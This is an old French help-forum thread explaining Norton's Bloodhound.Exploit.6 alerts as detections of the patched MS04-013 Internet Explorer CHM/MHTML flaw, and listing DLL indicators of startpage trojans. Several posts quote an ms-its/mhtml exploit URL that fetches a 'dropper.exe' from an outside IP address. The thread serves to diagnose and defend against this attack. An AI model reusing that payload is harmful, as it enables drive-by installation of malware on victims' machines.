Bloodhound6 et startpage?
moe
-
moe -
moe -
Salut à tous
Depuis hier je cherche une explication sur les alertes bloodhound exploit.6 que m'envois norton.
Ces alertes avaient lieux chaques fois que je faisais un copier/coller dans wordpad d'un bout de log hijackthis posté sur ce forum.
Notamment sur ce type de lignes:
O16 - DPF: {11111111-1111-1111-1111-511111193458} - file://c:\x.cab
O16 - DPF: {11120607-1001-1111-1000-110199901123} - ms-its:mhtml:file://C:\foo.mht!http:$$63.217.31.72/d1//xxx.chm::/dropper.exe
Impossible de coller ce type de ligne dans wordpad,à chaque fois norton
m'envois une alerte bloodhound 6.
Après de multiples scan AV, anti-troyens etc..qui se sont tous révélés négatifs, c'est en cherchant chez symantec que j'ai trouvé la raison de ses alertes.
Bloodhound.Exploit.6 est une détection heuristique pour des exploits d'une vulnérabilité de Microsoft Internet Explorer(et une de plus..). Cette vulnérabilité a été découverte en février 2004.
La vulnérabilité résulte de la manipulation incorrecte des dossiers de HTML incorporés dans des dossiers de CHM. (CHM est le format Microsoft-compilé d'aide de HTML.)
http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html
"Elle pourrait être exploitées par un attaquant afin de télécharger puis exécuter un fichier malicieux sur une machine vulnérable via une simple page HTML. Cette faille se situe au niveau du traitement des fichiers d'aide .chm, elle est actuellement exploitée par un trojan "Ibiza.A"(peut etre d'autres depuis...) qui s'installent automatiquement sur une machine vulnérable sans même l'intervention de l'utilisateur (sur simple visite d'une page html malicieuse).
ms-its:mhtml:file://C:\ss.MHT!http:$$www.example.com//chm.chm::/files/launch.htm"
http://www.k-otik.com/bugtraq/bulletins/69
En fait chaques fois que norton détecte se type de code, que se soit dans un lien hypertexte vérolé ou sur un site qui traite du sujet(sur la page de k-otik si dessus par exemple), il envois une alerte.
Crosoft a sorti un patch depuis avril:
http://www.microsoft.com/france/technet/securite/info/info.asp?mar=/france/technet/securite/info/ms04-013.html
Donc logiquement (enfin j'espère..),si le correctif a déjà été installé et que norton aboie au sujet de bloodhound 6, il n'y a pas lieu de trop s'inquiéter, c'est juste l'AV qui fait son boulot.
Ce qui est bizzare, c'est qu'un bon nombre de post sur le forum au sujet de startpage et ses variantes, ont un log hijack, avec le meme code exploitant la faille, dans les 016.
Est ce que quelqu'un peut confirmer ou envoyer aux oubliettes ce que j'avance?
Voili,voilou j'en ai fini!!
PS: bravo a toutes celles et ceux qui font vivre et bossent sur ce forum en y partagant leur temps et leur savoir.
a+
Depuis hier je cherche une explication sur les alertes bloodhound exploit.6 que m'envois norton.
Ces alertes avaient lieux chaques fois que je faisais un copier/coller dans wordpad d'un bout de log hijackthis posté sur ce forum.
Notamment sur ce type de lignes:
O16 - DPF: {11111111-1111-1111-1111-511111193458} - file://c:\x.cab
O16 - DPF: {11120607-1001-1111-1000-110199901123} - ms-its:mhtml:file://C:\foo.mht!http:$$63.217.31.72/d1//xxx.chm::/dropper.exe
Impossible de coller ce type de ligne dans wordpad,à chaque fois norton
m'envois une alerte bloodhound 6.
Après de multiples scan AV, anti-troyens etc..qui se sont tous révélés négatifs, c'est en cherchant chez symantec que j'ai trouvé la raison de ses alertes.
Bloodhound.Exploit.6 est une détection heuristique pour des exploits d'une vulnérabilité de Microsoft Internet Explorer(et une de plus..). Cette vulnérabilité a été découverte en février 2004.
La vulnérabilité résulte de la manipulation incorrecte des dossiers de HTML incorporés dans des dossiers de CHM. (CHM est le format Microsoft-compilé d'aide de HTML.)
http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html
"Elle pourrait être exploitées par un attaquant afin de télécharger puis exécuter un fichier malicieux sur une machine vulnérable via une simple page HTML. Cette faille se situe au niveau du traitement des fichiers d'aide .chm, elle est actuellement exploitée par un trojan "Ibiza.A"(peut etre d'autres depuis...) qui s'installent automatiquement sur une machine vulnérable sans même l'intervention de l'utilisateur (sur simple visite d'une page html malicieuse).
ms-its:mhtml:file://C:\ss.MHT!http:$$www.example.com//chm.chm::/files/launch.htm"
http://www.k-otik.com/bugtraq/bulletins/69
En fait chaques fois que norton détecte se type de code, que se soit dans un lien hypertexte vérolé ou sur un site qui traite du sujet(sur la page de k-otik si dessus par exemple), il envois une alerte.
Crosoft a sorti un patch depuis avril:
http://www.microsoft.com/france/technet/securite/info/info.asp?mar=/france/technet/securite/info/ms04-013.html
Donc logiquement (enfin j'espère..),si le correctif a déjà été installé et que norton aboie au sujet de bloodhound 6, il n'y a pas lieu de trop s'inquiéter, c'est juste l'AV qui fait son boulot.
Ce qui est bizzare, c'est qu'un bon nombre de post sur le forum au sujet de startpage et ses variantes, ont un log hijack, avec le meme code exploitant la faille, dans les 016.
Est ce que quelqu'un peut confirmer ou envoyer aux oubliettes ce que j'avance?
Voili,voilou j'en ai fini!!
PS: bravo a toutes celles et ceux qui font vivre et bossent sur ce forum en y partagant leur temps et leur savoir.
a+
2 réponses
salut
moi ce que je trouve de commun à ces trojan startpage c'est ceci:
un fichier dll
C:\WINDOWS\System32\ambbhg.dll par ex
et les lignes:
O2 - BHO: (no name) - {64DDE267-09FA-4A71-8987-C733B480B1F8} - C:\WINDOWS\System32\ambbhg.dll
O18 - Filter: text/html - {29EB986D-2A6C-47EE-ADAA-BCA6F1A04A14} C:\WINDOWS\System32\ambbhg.dll
O18 - Filter: text/plain - {29EB986D-2A6C-47EE-ADAA-BCA6F1A04A14} - C:\WINDOWS\System32\ambbhg.dll
Variante avec ohpf.dll au lieu de ambbhg.dll ou aussi gglk.dll
Dans les lignes 02 et 018 (2x)
a+
moi ce que je trouve de commun à ces trojan startpage c'est ceci:
un fichier dll
C:\WINDOWS\System32\ambbhg.dll par ex
et les lignes:
O2 - BHO: (no name) - {64DDE267-09FA-4A71-8987-C733B480B1F8} - C:\WINDOWS\System32\ambbhg.dll
O18 - Filter: text/html - {29EB986D-2A6C-47EE-ADAA-BCA6F1A04A14} C:\WINDOWS\System32\ambbhg.dll
O18 - Filter: text/plain - {29EB986D-2A6C-47EE-ADAA-BCA6F1A04A14} - C:\WINDOWS\System32\ambbhg.dll
Variante avec ohpf.dll au lieu de ambbhg.dll ou aussi gglk.dll
Dans les lignes 02 et 018 (2x)
a+
salut bernie61
Tu as raison, apparement je m suis un peu emballé, en voyant ce type de code dans certains logs hijack posté pour startpage, mais il y a pas mal de trojans,worms,malwares qui exploite cette faille.
http://fr.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=58546&VName=MS04-013_MS_OUTLOOK_EXPRESS&VSect=T
mais les attaques de types: ms-its:mhtml:file://C:\foo.mht!http:$$63.217.31.72/d1//xxx.chm::/dropper.exe
sont surtout utilisé pour du keylogging et hijacking.
Pour ceux que ca interresse, une tres bonne analyse technique ici:
http://www.google.fr/search?q=cache:M8NzLlyg2HEJ:tms.symantec.com/documents/040617-Analysis-FinancialInstitutionCompromise.pdf+malware++MS04-013&hl=fr
En fait le but de mon 1er post était surtout pour ceux qui ont des alertes bloodhound exploit.6 avec norton et qui se demandent se que c'est.
a+
Tu as raison, apparement je m suis un peu emballé, en voyant ce type de code dans certains logs hijack posté pour startpage, mais il y a pas mal de trojans,worms,malwares qui exploite cette faille.
http://fr.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=58546&VName=MS04-013_MS_OUTLOOK_EXPRESS&VSect=T
mais les attaques de types: ms-its:mhtml:file://C:\foo.mht!http:$$63.217.31.72/d1//xxx.chm::/dropper.exe
sont surtout utilisé pour du keylogging et hijacking.
Pour ceux que ca interresse, une tres bonne analyse technique ici:
http://www.google.fr/search?q=cache:M8NzLlyg2HEJ:tms.symantec.com/documents/040617-Analysis-FinancialInstitutionCompromise.pdf+malware++MS04-013&hl=fr
En fait le but de mon 1er post était surtout pour ceux qui ont des alertes bloodhound exploit.6 avec norton et qui se demandent se que c'est.
a+
